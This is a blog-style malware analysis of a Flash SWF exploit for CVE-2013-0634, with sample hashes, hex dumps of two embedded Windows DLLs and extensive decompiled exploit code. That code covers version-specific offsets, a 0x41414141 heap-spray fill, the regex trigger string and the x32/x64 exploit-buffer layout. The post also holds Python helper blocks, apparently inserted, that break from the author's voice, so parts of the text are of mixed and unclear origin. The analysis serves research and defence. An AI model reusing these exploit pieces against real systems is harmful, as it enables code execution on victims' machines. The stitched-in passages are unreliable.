Sunday, February 10, 2013

"Confirmed ITW" CVE-2013-0634 This LadyBoyle is not nice at all.

It all started from curiosity and ended up as a serious analysis, testing and reporting..
So we have the SWF exploitation of CVE-2013-0634, and I dared myself to analyze what we suspect is a sample of it, to try to understand what is really going on there. Warning :-) I am a unix engineer and not a Flash developer, so bear with me for things missing here and there. There are still many unsolved mysteries and questions for me, so please feel free to ping me on twitter or leave your comment for a better thought.

Summary of analysis of a suspected CVE-2013-0634 sample


I'd like to put the conclusion first, since the analysis is long and will be continued. The result is not far from what FireEye released -->>[HERE]
But I prefer to peel into more detail on the code only, and not to include the payload details in this partial post, since the exploit details themselves take a long explanation, as follows:

Summary

The malicious SWF checks/detects whether your system is x32 or x64; it provides both malwares and an exploit scheme, including the exploit data streams, for both platforms (two types of shellcode, x32 & x64, are also suspected to exist & are still under investigation).

In my case, upon post-exploitation it drops (streams out, "extracts") a DLL malware file from the embedded binary object. The shellcode itself will drop a malware library into the %Temp% path and execute it to drop the malware executable binary.

The extraction process for the embedded attachment is well explained in the Adobe API reference -->>[HERE]
Which I quote as per below:

ByteArrayAsset is a subclass of the flash.utils.ByteArray class which represents an arbitrary sequence of byte data that you embed in a Flex application.

The byte data that you are embedding can be in any kind of file, and the entire file is always embedded. You cannot embed the bytes of a particular asset that is in a SWF file, although you can embed an entire SWF file.

The MXML compiler autogenerates a class that extends ByteArrayAsset to represent the embedded data:

The compiler autogenerates a subclass of the ByteArrayAsset class and sets your variable to be a reference to this autogenerated class. You can then use this class reference to create instances of the ByteArrayAsset using the new operator, and you can extract information from the byte array using methods of the ByteArray class:

var storyByteArray:ByteArrayAsset = ByteArrayAsset(new storyClass());

To be NOTED: the binaries are not encoded in the JS/code parts; the JS/code was used for the exploitation act.
The post-exploit itself runs the x32 or x64 function to extract the object, which are windows x32 and x64 DLL files. It is aiming ONLY at the windows platform, targeting these flash versions:

11,5,502,146 11,4,402,287 11,5,502,135 11,4,402,278 11,5,502,110 11,4,402,265
The exploit was said to aim at ActiveX; yes, in the sample I analyzed I saw code checking for it, BUT in the code I also saw an exploitation scheme for the Flash player without ActiveX support.
*) You'll see the explanation of the theory above in the code analysis parts.

The method flash.utils::ByteArray, followed by flash.utils::Endian and the callpropvoid of writeInt to push the malicious endian-ordered values, is the execution part of this exploitation. Before it we can find the stack overflow usage by malicious values like 0x41414141 and 0xFFFFFFF8 in the Flash Vector object formed, and the method of using a textfield (with the font parameter set in it) to be filled with the vector object formed.

The strings used for exploitation are cleverly scattered between _local* variables, which makes them difficult to trace by eye, so with the help of a debugger we can understand the flow.

I'm currently in the middle of separating the exploit strings while writing this at the same time, & trying to find a solid PoC of the shellcode, which is still in process. Since the references for the exploit in this CVE are still not clear here and there (some references mention buffer overflow while others mention memory corruption), considering that new information still keeps popping up, and given the lack of analysis samples of the CVE-2013-0634 SWF file itself (so far I found only ONE "suspected" sample of CVE-2013-0634 posted in VT), I decided to take a break for a while and take the liberty to split the post into parts (1 and 2) and make updates in the related topic.

The Sample

New information: As advised, I took the liberty to choose a sample posted in VirusTotal -->>[URL], and I picked the recent one with the below details:
Sample : ieee2013.swf
MD5    : bf29f7d83580b4b4355dbc8a82b4972a
SHA256 : 19a5e24e8c90e2d7f65729455c3fd8b89ebbfdc8d218db3ab4a3193100106267
File size: 498.8 KB ( 510762 bytes )
File name: ieee2013.swf
File type: Flash
Tags: exploit flash cve-2013-0634
Detection ratio: 12 / 45
Analysis date: 2013-02-08 19:32:42 UTC ( 17 hours, 20 minutes ago )
Malware names:
F-Secure                 : Dropped:Trojan.Agent.AYAF
DrWeb                    : Exploit.CVE2013-0633.1
GData                    : Dropped:Trojan.Agent.AYAF
Norman                   : Shellcode.E
McAfee-GW-Edition        : Heuristic.BehavesLike.Exploit.Flash.CodeExec.O
MicroWorld-eScan         : Dropped:Trojan.Agent.AYAF
Avast                    : Win32:Malware-gen
nProtect                 : Dropped:Trojan.Agent.AYAF
BitDefender              : Dropped:Trojan.Agent.AYAF
McAfee                   : Exploit-CVE2013-0633
ESET-NOD32               : SWF/Exploit.CVE-2013-0634.A
Microsoft                : Exploit:SWF/CVE-2013-0634
At the time I chose it, it was so convincing.. But while analyzing the sample deeper it turned out to contain fakes..

Updates - 2013, Feb 26, just before midnight..

Eric Romang (@eromang) found CVE-2013-0634 in the wild, spread by the Gong Da(d) Exploit Kit, which can be read in his report here -->>[HERE] The sample he uploaded to VirusTotal is here -->>[VIRUS-TOTAL] And I confirmed it as the same code as we posted in this post. Snapshot of the codes is: So this is the hard evidence that this exploit infects in the wild. For research purposes, you may confirm it yourself here -->>[HERE] I thank Eric Romang for sharing the information that we must be aware of!

Understanding the Structure

It is good to visualize the structure of the swf sample. I use Action Script for this purpose; this sample looks like below: We need to break it down now, using a SWF dumper tool to see the format:
 * Total # of File Tags: 88
 * End (0) -- total: 1
 * ScriptLimits (65) -- total: 1
 * DoABC2 (82) -- total: 1
 * ShowFrame (1) -- total: 1
 * FileAttributes (69) -- total: 1
 * DefineBinaryData (87) -- total: 2 <==w00t
 * SetBackgroundColor (9) -- total: 1
 * ProductInfo (41) -- total: 1
 * FrameLabel (43) -- total: 1
 * SymbolClass (76) -- total: 1
 * Metadata (77) -- total: 1
↑So we HAVE two binaries embedded from the beginning. Viewing the metadata we know it fakes an "Adobe Flex 4 Application":
<Metadata>
  <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>
  <rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/elements/1.1'>
  <dc:format>application/x-shockwave-flash</dc:format>
  <dc:title>Adobe Flex 4 Application</dc:title>
  <dc:description>http://www.adobe.com/products/flex</dc:description>
  <dc:publisher>unknown</dc:publisher>
  <dc:creator>unknown</dc:creator>
  <dc:language>EN</dc:language>
  <dc:date>Feb 4, 2013</dc:date>
  </rdf:Description></rdf:RDF>
</Metadata>
I tend to check the SWF timestamp in the product info:
<ProductInfo product='Adobe Flex' edition='' 
  version='4.6' build='23201' 
  compileDate='Tue Feb 5 00:56:14 2013 UTC'/>
Checking the SymbolClass:
<SymbolClass>
  <Symbol idref='1' className='LadyBoyle_the_x32_Class' />
  <Symbol idref='2' className='LadyBoyle_the_x64_Class' />
  <Symbol idref='0' className='LadyBoyle' />
</SymbolClass>
↑You'll see the classes with the strings x32 and x64 in there.. These are the binary tags:
<DefineBinaryData id='1' idrefName='LadyBoyle_the_x32_Class' length='247296' />
<DefineBinaryData id='2' idrefName='LadyBoyle_the_x64_Class' length='246272' />
So let's confirm whether the embedded binaries are really there, and if so, figure out their type. Recheck the hex of the SymbolClass part.. to double check...
3f 13 42 00 00 00 03 00 01 00 4c 61 64 79 42 6f | ?*B*******LadyBo |
79 6c 65 5f 74 68 65 5f 78 33 32 5f 43 6c 61 73 | yle_the_x32_Clas |
73 00 02 00 4c 61 64 79 42 6f 79 6c 65 5f 74 68 | s***LadyBoyle_th |
65 5f 78 36 34 5f 43 6c 61 73 73 00 00 00 4c 61 | e_x64_Class***La |
64 79 42 6f 79 6c 65 00                         | dyBoyle*         |
OK, it looks like the binaries are there.. to be sure, let's dump and see them.. Here's the x32 first block...
ff 15 06 c6 03 00 01 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c 49 48 4c | .***$*******|IHL |
38 28 26 1f 38 28 26 1f 38 28 26 1f 31 50 a2 1f | 8(&*8(&*8(&*1P** |
21 28 26 1f 31 50 b3 1f 28 28 26 1f 31 50 a5 1f | !(&*1P**((&*1P** |
70 28 26 1f 1f ee 5d 1f 3b 28 26 1f 38 28 27 1f | p(&***]*;(&*8('* |
77 28 26 1f 31 50 ac 1f 3b 28 26 1f 31 50 b7 1f | w(&*1P**;(&*1P** |
39 28 26 1f 52 69 63 68 38 28 26 1f 00 00 00 00 | 9(&*Rich8(&***** |
00 00 00 00 50 45 00 00 4c 01 05 00 fc 40 10 51 | ****PE**L****@*Q |
00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 | ***********!**** |
00 66 00 00 00 5c 03 00 00 00 00 00 d6 13 00 00 | *f***\********** |
And the second one... the x64 binary (1st block snipped):
ff 15 06 c2 03 00 02 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 25 09 b1 | .***$********%** |
e0 44 67 e2 e0 44 67 e2 e0 44 67 e2 e9 3c e3 e2 | *Dg**Dg**Dg**<** |
f9 44 67 e2 e9 3c e4 e2 a4 44 67 e2 e9 3c f2 e2 | *Dg**<***Dg**<** |
e9 44 67 e2 c7 82 1c e2 e5 44 67 e2 e0 44 66 e2 | *Dg******Dg**Df* |
b2 44 67 e2 e9 3c ed e2 e3 44 67 e2 e9 3c f6 e2 | *Dg**<***Dg**<** |
e1 44 67 e2 52 69 63 68 e0 44 67 e2 00 00 00 00 | *Dg*Rich*Dg***** |
00 00 00 00 50 45 00 00 64 86 06 00 fa 40 10 51 | ****PE**d****@*Q |
00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 | **********" **** |
By experience I know both are DLL files..
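As an added check (my code, not the post's or the sample's), the walk done above with the SWF dumper can be reproduced in a few lines: parse the tag stream, bind the DefineBinaryData ids to the SymbolClass names, and instead of judging "by experience" read the COFF header of each embedded blob for the Machine type and the IMAGE_FILE_DLL flag. The SymbolClass bytes quoted from the hex dump above are decoded as they are; the SWF fed to analyze_swf is a constructed stand-in with two tiny fake PEs, not the real ieee2013.swf.

```python
import struct
import zlib

# Tag codes from the dumper summary above (subset of the SWF spec)
TAG_NAMES = {0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 41: "ProductInfo",
             43: "FrameLabel", 65: "ScriptLimits", 69: "FileAttributes",
             76: "SymbolClass", 77: "Metadata", 82: "DoABC2", 87: "DefineBinaryData"}
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "x86", 0x8664: "x64"}
# SymbolClass tag bytes as dumped from the sample above: 6-byte header + 66-byte payload
PAGE_SYMBOLCLASS_HEX = ("3f134200000003000100 4c616479426f796c655f7468655f7833325f436c61737300"
                        " 0200 4c616479426f796c655f7468655f7836345f436c61737300"
                        " 0000 4c616479426f796c6500")

def swf_body(data):
    """Tag stream after the 8-byte header; inflated when the signature is CWS."""
    if data[:3] == b"FWS":
        return data[8:]
    if data[:3] == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("unsupported SWF signature (LZMA 'ZWS' is not handled here)")

def iter_tags(body, pos=None):
    """Yield (code, payload): UI16 header = code << 6 | length, UI32 length when 0x3F."""
    if pos is None:  # skip RECT (5 + 4*Nbits bits, byte padded), frame rate and frame count
        pos = (5 + 4 * (body[0] >> 3) + 7) // 8 + 4
    while pos + 2 <= len(body):
        head = struct.unpack_from("<H", body, pos)[0]
        code, length, pos = head >> 6, head & 0x3F, pos + 2
        if length == 0x3F:
            length, pos = struct.unpack_from("<I", body, pos)[0], pos + 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:  # End tag
            break

def parse_symbol_class(payload):
    """SymbolClass: UI16 count, then (UI16 tag id, NUL-terminated class name) pairs."""
    count, pos, names = struct.unpack_from("<H", payload, 0)[0], 2, {}
    for _ in range(count):
        tag_id = struct.unpack_from("<H", payload, pos)[0]
        end = payload.index(b"\x00", pos + 2)
        names[tag_id] = payload[pos + 2:end].decode("latin-1")
        pos = end + 1
    return names

def pe_info(blob):
    """MZ at 0, e_lfanew at 0x3C, then COFF Machine (+4) and Characteristics (+22)."""
    if blob[:2] != b"MZ" or len(blob) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if len(blob) < e_lfanew + 24 or blob[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    characteristics = struct.unpack_from("<H", blob, e_lfanew + 22)[0]
    return {"machine": MACHINES.get(machine, hex(machine)),
            "is_dll": bool(characteristics & IMAGE_FILE_DLL)}

def analyze_swf(data):
    """Tag counts, SymbolClass bindings, and each DefineBinaryData blob with its PE verdict."""
    counts, symbols, binaries = {}, {}, []
    for code, payload in iter_tags(swf_body(data)):
        name = TAG_NAMES.get(code, "Unknown(%d)" % code)
        counts[name] = counts.get(name, 0) + 1
        if code == 76:
            symbols.update(parse_symbol_class(payload))
        elif code == 87:  # UI16 tag id, UI32 reserved, then the embedded bytes
            tag_id, blob = struct.unpack_from("<H", payload, 0)[0], payload[6:]
            binaries.append({"id": tag_id, "length": len(blob), "pe": pe_info(blob)})
    for item in binaries:
        item["class"] = symbols.get(item["id"])
    return counts, symbols, binaries

def decode_page_symbolclass():
    """Run the parser over the SymbolClass bytes quoted from the sample's hex dump."""
    raw = bytes.fromhex(PAGE_SYMBOLCLASS_HEX.replace(" ", ""))
    (code, payload), = list(iter_tags(raw, pos=0))
    return code, parse_symbol_class(payload)

# --- constructed sample, not the real ieee2013.swf: two tiny fake PEs wired like the sample
def fake_pe(machine, characteristics):
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: COFF header right after the DOS header
    return bytes(dos) + b"PE\x00\x00" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)

def tag(code, payload):
    if len(payload) < 0x3F:
        return struct.pack("<H", (code << 6) | len(payload)) + payload
    return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload

def build_sample_swf():
    body = b"\x00" + struct.pack("<HH", 24 << 8, 1)  # RECT with Nbits=0, 24 fps, 1 frame
    body += tag(69, b"\x08\x00\x00\x00")              # FileAttributes (ActionScript3 flag)
    body += tag(87, struct.pack("<HI", 1, 0) + fake_pe(0x014C, 0x2102))
    body += tag(87, struct.pack("<HI", 2, 0) + fake_pe(0x8664, 0x2022))
    body += tag(76, b"\x03\x00\x01\x00LadyBoyle_the_x32_Class\x00"
                    b"\x02\x00LadyBoyle_the_x64_Class\x00\x00\x00LadyBoyle\x00")
    body += tag(0, b"")
    return b"FWS\x0a" + struct.pack("<I", 8 + len(body)) + body
```

On the real dump above the same check reads Machine 0x014c / Characteristics 0x2102 for the first blob and 0x8664 / 0x2022 for the second, i.e. an x86 DLL and an x64 DLL.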

Code Analysis

All of the variables prepared for exploitation always appear in pairs.. for example like below, suggesting different methods are used for x32 & x64:
(_local5[_local7][_local22] as Vector. < Number > )[17] = this.UintToDouble(0xFFFFFFFF, _local9);
(_local5[_local7][_local22] as Vector. < Number > )[18] = this.UintToDouble(0x41414141, 0);
Despite the pairing scheme, a "generic" code scheme was also spotted, i.e. checking the exact version of the Windows OS:
switch (_local19) {   
    case "windows 7":
        break;    
    case "windows server 2008 r2":        
        break;    
    case "windows server 2008":        
        break;    
    case "windows server 2003 r2":        
        break;    
    case "windows server 2003":        
        break;    
    case "windows xp":        
        break;    
    case "windows vista":        
        break;    
    default:        
        return (this.empty());  };        
It scattered the exploit strings into integer values with _local%n names; it checked the Windows OS's flash player version & allocated a different integer value if the flash player has playertype=activex (see below), ...and...
switch (_local27) {
    case "win 11,5,502,146":
        if (capabilities.playertype.tolowercase() == "activex") {  
            _local25 = (_local16 - 1838536);                       
            _local26 = (_local16 - 574720);                                };            
        break;        
    case "win 11,5,502,135":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 2266027);        
            _local26 = (_local16 - 574864);                    };            
        break;        
    case "win 11,5,502,110":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 1600110);        
            _local26 = (_local16 - 574424);                    };            
        break;        
    case "win 11,4,402,287":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 4624790);        
            _local26 = (_local16 - 574196);                    };            
        break;        
    case "win 11,4,402,278":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 1227937);        
            _local26 = (_local16 - 573876);                    };            
        break;        
    case "win 11,4,402,265":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 7925883);        
            _local26 = (_local16 - 573876);                    };            
        break;
.. then prepared a bigger init value for flash without ActiveX...
default:  
    (_local5[_local7][_local22] as Vector. < Number > )[536870911] = this.UintToDouble(16, _local9);        
    return;  };     
The other part of the exploit values is implemented in other "_local*" variables in a separate section, as I pasted here -->>[HERE] [Additional] As so many other researchers have already noticed, a regex operation was spotted, suspected of being the direct exploitation. Actually I wanted to expose this after getting more info, but OK, since so many questions came.. here we go: It filled a var with this regex string & assigned it to a RegExp:
_local2 = "(?i)()()(?-i)||||||||||||||||||||||";
var _local20: RegExp = new RegExp(_local2, "");
To be used in the operation forming the exploitation object: Why was this regex used? We saw it used as it is.. To grep the pattern defined, PoC from the debug code:
3509 pushstring     "(?i)()()(?-i)||||||||||||||||||||||"
3512 findpropstrict RegExp //nameIndex = 66
3517 constructprop  RegExp (2) //nameIndex = 66
3520 coerce         RegExp //nameIndex = 66
And the memory snapshot below:
0a 77 69 6e 64 6f 77 73 20 78 70 0d 77 69 6e 64| *windows xp*wind |
6f 77 73 20 76 69 73 74 61 0c 66 72 6f 6d 43 68| ows vista*fromCh |
61 72 43 6f 64 65 06 52 65 67 45 78 70 23 28 3f| arCode*RegExp#(? |
69 29 28 29 28 29 28 3f 2d 69 29 7c 7c 7c 7c 7c| i)()()(?-i)||||| |
7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c| |||||||||||||||| |
7c 06 6c 65 6e 67 74 68 10 77 72 69 74 65 55 6e| |*length*writeUn |
73 69 67 6e 65 64 49 6e 74 0a 70 6c 61 79 65 72| signedInt*player |
54 79 70 65 07 61 63 74 69 76 65 78 05 66 6c 75| Type*activex*flu |
73 68 0a 77 72 69 74 65 42 79 74 65 73 05 45 72| sh*writeBytes*Er |
72 6f 72 01 65 0c 66 6c 61 73 68 2e 65 76 65 6e| ror*e*flash.even |
74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68| ts*EventDispatch |
65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| er*DisplayObject |
11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65| *InteractiveObje |
63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| ct*DisplayObject |
43 6f 6e 74 61 69 6e 65 72 1a 16 01 16 05 16 08| Container******* |
↑At the time the regex executed, it ran w/o crash. So whether the RegExp aka regex value of "(?i)()()(?-i)||||||||||||||||||||||" has anything to do with the direct exploitation is still a question to me. The exploitation happened at the time the textfield was filled with the malicious vector containing the exploit bits (in my case). That's why I desperately need to seek other samples or a better memory shot to be sure of this regex method, & that is the reason why I did not write about it before. [NEW ADDITIONAL] The usage of the regex, which functions as the trigger of the overall exploitation, is explained by HaifeiLi -->>[HERE] Let's continue: The _local5 array contains vector <number> and <object>, and the below checkpoints make sure of it; if we follow it further, _local5 will be used with additional hard-coded bits: Next.. depending on the processor type it assembled the strings using writeUnsignedInt. This is the code for x32...
// initialization of the bins.. see where the 0x41 0x41 0x41 starts..
while (_local1 < (0x0400 * 100)) {
    _local17.writeUnsignedInt(0x41414141);
    _local1++;
};

// transferring the result to other vars...
_local12 = (_local12 + _local17.position);
_local14 = _local17.position;


// building the x32 exploit here... with the unsigned integer flood...
 _local17.endian = Endian.LITTLE_ENDIAN;
 _local34 = _local17.position;
 _local17.position = (_local17.position + 224);
 _local17.writeUnsignedInt(_local25);
 _local17.position = _local34;
 _local17.position = (_local17.position + 160);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.position = _local34;
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(64);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local39);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local17.position + 40);
 _local17.writeUnsignedInt(_local36);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.writeUnsignedInt(_local38);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(0x2000);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local26);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local40);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local34 + 0x0100);
 _local17.writeUnsignedInt(1442615440);
 _local17.writeUnsignedInt(4041507656);
              :
              :(snipped)
And this is for x64...
_local17.writeBytes(_local35, 0, _local35.length);
_local12 = _local13;
_local15 = ((((_local12 + 128) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local15 = ((((_local12 + 16) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = (_local12 + _local14);
_local17.position = _local14;                   

// Building the x64 exploit,
_local34 = _local17.position;
_local17.position = (_local17.position + 224);
_local17.writeUnsignedInt(_local25);
_local17.position = _local34;
_local17.position = (_local17.position + 160);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.writeUnsignedInt(_local31);
_local17.position = _local34;
_local17.writeUnsignedInt(_local37);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(64);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(_local39);
_local17.writeUnsignedInt(0);
_local17.position = (_local17.position + 40);
_local17.writeUnsignedInt(_local36);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.writeUnsignedInt(_local31);
_local17.writeUnsignedInt(_local38);
              :
_local17.writeUnsignedInt(0);
_local17.position = (_local34 + 0x0100);
_local17.writeUnsignedInt(1442615440);
_local17.writeUnsignedInt(4041507656);
_local17.writeUnsignedInt(1708274504);
              :
              :(snipped)
The _local17 above was filled by values of vector objects filled by the logic: Random → Vector flood by ByteArray → formed into the function ReadDouble to be used to form the exploit object; flow details are --->>[HERE] Please note the usage of the hard-coded bits 0x41414141 in the vector object, and the usage of 0xFFFFFFF8 for gaining heap allocation/deallocation. Correction: 0xFFFFFFF8 is used to convert 0x*******1 to 0x*******0, which is the correct address for the exploit. ←Thanks to @promised_lu for pointing this out :-) PS: I still can't figure out why the hard-coded 0x41414141 bits are there... The usage of a text field with a font, to be filled with the exploit values aiming for the overflow, was also detected:
function empty(): void {
  var _local1: textfield = new textfield();
  _local1.autosize = TextFieldAutoSize.left;
  var _local2: textformat = new textformat();
  _local2.size = 30;
  _local2.font = "Arial";
  _local2.color = 0xFF0000;
  _local1.settextformat(_local2);
  _local1.text = " ";
  addChild(_local1);
}
After the exploit form is built, it went into the execution of the part of the code forming the object, which in the debug code can be viewed below:
0    getlocal0      
1    pushscope      
2    findpropstrict flash.utils::ByteArray //nameIndex = 19
4    constructprop  flash.utils::ByteArray (0) //nameIndex = 19
7    coerce         flash.utils::ByteArray //nameIndex = 19
9    setlocal3      
10   getlocal3      
11   getlex         flash.utils::Endian //nameIndex = 40
13   getproperty    LITTLE_ENDIAN //nameIndex = 41
15   setproperty    endian //nameIndex = 42
17   getlocal3      
18   getlocal1      
19   callpropvoid   writeInt (1) //nameIndex = 43
22   getlocal3      
23   getlocal2      
24   callpropvoid   writeInt (1) //nameIndex = 43
↑It means: using flash.utils::ByteArray to write integers as little endian (I call this stream-out, referring to the Adobe API, = "extracting") .. to writeInt values as per the mixed hex -->>[HERE] (need to split these in two for x32 and x64.. a lot of work to do..) ..to then execute the process below:
25   pushbyte       0
26   setproperty    position //nameIndex = 44
27   getlocal3      
28   callproperty   readDouble (0) //nameIndex = 45
29   returnvalue    
..at this point the returned value points to the LadyBoyle x32 OR x64 binary Class (the code is below)
    import mx.core.*;
    public class LadyBoyle_the_x32_Class extends ByteArrayAsset {
↑for the x32 ..and for the x64↓
    import mx.core.*;
    public class LadyBoyle_the_x64_Class extends ByteArrayAsset {
to extract the embedded object as described here -->>[AdobeAPIPage] The complete decompiled code of the SWF of CVE-2013-0634, in neutralized form, is here -->>[PASTEBIN]
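As an added check (my code, not the sample's or the post's), this reproduces in Python what the ByteArray opcode sequence above computes, and what the UintToDouble/ReadDouble pair used earlier on the Vector.<Number> relies on: two 32-bit words written LITTLE_ENDIAN and read back with readDouble keep their exact bit pattern inside one Number, which is how raw values like 0x41414141 end up in the vector. The 0xFFFFFFF8 alignment mask and a small dump decoder for spotting such fills are included; all function names are my own.

```python
import struct

def uint_to_double(lo, hi):
    """Same computation as the bytecode above: LITTLE_ENDIAN, writeInt(lo), writeInt(hi),
    position = 0, readDouble.  The Number's 8 bytes are exactly the two 32-bit words."""
    return struct.unpack("<d", struct.pack("<II", lo & 0xFFFFFFFF, hi & 0xFFFFFFFF))[0]

def read_double(number):
    """Inverse: split a Number back into its (lo, hi) words, as the sample's ReadDouble does."""
    return struct.unpack("<II", struct.pack("<d", number))

def align_down_8(value):
    """The 0xFFFFFFF8 mask noted above: clears the low 3 bits, so 0x*******1 -> 0x*******0."""
    return value & 0xFFFFFFF8

def is_nan_pattern(lo, hi):
    """Exponent bits all set with a non-zero mantissa encodes NaN; a runtime may canonicalize
    such Numbers, so only pairs outside this range are guaranteed to survive the round trip."""
    return (hi & 0x7FF00000) == 0x7FF00000 and bool((hi & 0x000FFFFF) or lo)

def encode_numbers(values):
    """Serialize Numbers the way a little-endian ByteArray or a Vector.<Number> dump lays them out."""
    return struct.pack("<%dd" % len(values), *values)

def decode_number_dump(data):
    """Read a dump of 8-byte Numbers back as (lo, hi) word pairs, e.g. to spot 0x41414141 fill."""
    return [struct.unpack_from("<II", data, off) for off in range(0, len(data) - 7, 8)]

def count_marker(data, marker=0x41414141):
    """Count the 32-bit words in a dump equal to the marker value (constructed inspection helper)."""
    return sum(word == marker for pair in decode_number_dump(data) for word in pair)
```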

The debug..

It's time to run this swf in debug mode.. like in a binary analysis I want to capture everything I can. The (long) complete debug main init trace list is here --->>[HERE] See how it ends up pointing to the classes the_x32_Class:Class or the_x64_Class:Class. You can also grep the "pushint" to grep all of the pushed values related to the code - for the x32 and x64 -->>[HERE] If we divide it right we may split the values of x32 and x64. (on it..) You can compare those strings with the memory snapshot here --->>[HERE] The dumped binary can be downloaded here -->>[HERE] Since the code initiates the 32 & 64 bit as the detailed classes↓...
this.the_x32_Class = LadyBoyle_the_x32_Class;
this.the_x64_Class = LadyBoyle_the_x64_Class;
...and below are the execution traces of LadyBoyle for 32/64 bit to get the embedded binary object. For 32bit:
init():* 
// disp_id=0 method_id=15 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3689 code position=16442 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x32_Class //nameIndex = 80 
 4      getlex         Object //<--- nameIndex = 54  
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x32_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x32_Class //nameIndex = 21 
 22     returnvoid      
The 64bit:
init():* 
// disp_id=0 method_id=18 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3701 code position=16498 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x64_Class //nameIndex = 81 
 4      getlex         Object // <----nameIndex = 54 
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x64_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x64_Class //nameIndex = 22 
 22     returnvoid      
The getlex for objects → ByteArray → ByteArrayAsset → is calling the embedded "LadyBoyle" class containing the malware DLL binary to be extracted on the victim's PC.. [Additional-2] @promised_lu, the author of pmswalker, did a very good reversing of this exploit sample, exposing the security bypass ROP chain & the SHELLCODE formed during exploitation. You can see his good analysis here -->>[LINK] This is the VERY important chain that I was looking for from the beginning: the existence of the shellcode, which explains the operations below: Searching for the %Temp% path and loading a library, as per below:
   :
069442C2 FFE0  jmp     eax        
